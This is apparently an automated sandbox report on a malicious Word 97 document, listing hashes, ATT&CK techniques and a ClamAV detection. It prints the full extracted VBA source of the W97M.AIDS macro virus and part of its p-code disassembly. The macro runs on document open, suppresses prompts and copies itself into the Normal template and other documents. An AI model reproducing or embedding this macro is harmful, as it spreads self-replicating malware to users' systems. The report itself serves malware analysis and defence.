Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e3d817ae59578290…

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-04-03 08:40:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3d746fbad3df1c159341debcb33f0b27 SHA-1: a72abd53d196ee3e5c559187a4ba2c848e8cde2b SHA-256: e3d817ae5957829055930e6e24818114aec2cf05f9f0588eee7f639fb7164c27
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon document opening. The ClamAV detection of 'Win.Trojan.Trojan-355' strongly indicates malicious intent. The VBA script appears to manipulate the document's code, likely to facilitate the execution of a dropped payload.

Heuristics 3

  • ClamAV: Win.Trojan.Trojan-355 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Trojan-355
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6608 bytes
SHA-256: ffb160bac25ab880c3d3780d0a58af587a1b40773bf7caa89f349b702cfa0391
Detection
ClamAV: Win.Trojan.Trojan-355
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function AIDS()
Application.EnableCancelKey = wdCancelDisabled
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Set TD = ThisDocument.VBProject.VBComponents
For FindCode = 1 To TD.Count
If TD.Item(FindCode).CodeModule.CountOfLines > 0 Then
For CodeLines = 1 To TD.Item(FindCode).CodeModule.CountOfLines
If TD.Item(FindCode).CodeModule.Lines(CodeLines, 1) = "Private Function AIDS()" Then
MyCode = TD.Item(FindCode).CodeModule.Lines(CodeLines, 32)
End If
Next
End If
Next
If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument
Set TargetComp = Target.VBProject.VBComponents
For TargetModule = 1 To TargetComp.Count
If TargetComp.Item(TargetModule).CodeModule.CountOfLines > 0 Then
For CodeLines = 1 To TargetComp.Item(TargetModule).CodeModule.CountOfLines
If TargetComp.Item(TargetModule).CodeModule.Lines(CodeLines, 1) = "Private Function AIDS()" Then End
Next
For CodeLines = 1 To TargetComp.Item(TargetModule).CodeModule.CountOfLines
If Left(TargetComp.Item(TargetModule).CodeModule.Lines(CodeLines, 1), 12) = "Private Sub " Then
TargetComp.Item(TargetModule).CodeModule.ReplaceLine CodeLines, TargetComp.Item(TargetModule).CodeModule.Lines(CodeLines, 1) & ": AIDS"
ElseIf Left(TargetComp.Item(TargetModule).CodeModule.Lines(CodeLines, 1), 4) = "Sub " Then
TargetComp.Item(TargetModule).CodeModule.ReplaceLine CodeLines, TargetComp.Item(TargetModule).CodeModule.Lines(CodeLines, 1) & ": AIDS"
End If
Next
TargetComp.Item(TargetModule).CodeModule.AddFromString MyCode
End If
Next
End Function
Private Sub Document_Open(): AIDS
End Sub
'Do Not Distribute
'Name = W97M.AIDS
'Author = Lys Kovick

' Processing file: /opt/analyzer/scan_staging/24f50331f3ca432f8a6bb1d9c6826507.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3154 bytes
' Line #0:
' 	FuncDefn (Private Function AIDS(id_FFFE As Variant))
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #4:
' 	SetStmt 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	Set TD 
' Line #5:
' 	StartForVariable 
' 	Ld FindCode 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld TD 
' 	MemLd Count 
' 	For 
' Line #6:
' 	Ld FindCode 
' 	Ld TD 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #7:
' 	StartForVariable 
' 	Ld CodeLines 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld FindCode 
' 	Ld TD 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #8:
' 	Ld CodeLines 
' 	LitDI2 0x0001 
' 	Ld FindCode 
' 	Ld TD 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0017 "Private Function AIDS()"
' 	Eq 
' 	IfBlock 
' Line #9:
' 	Ld CodeLines 
' 	LitDI2 0x0020 
' 	Ld FindCode 
' 	Ld TD 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St MyCode 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	EndIfBlock 
' Line #13:
' 	StartForVariable 
' 	Next 
' Line #14:
' 	Ld ThisDocument 
' 	Ld ActiveDocument 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set Target 
' 	Else 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set Target 
' 	EndIf 
' Line #15:
' 	SetStmt 
' 	Ld Target 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	Set TargetComp 
' Line #16:
' 	StartForVariable 
' 	Ld TargetModule 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld TargetComp 
' 	MemLd Count 
' 	For 
' Line #17:
' 	Ld TargetModule 
' 	Ld TargetComp 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfL
... (truncated)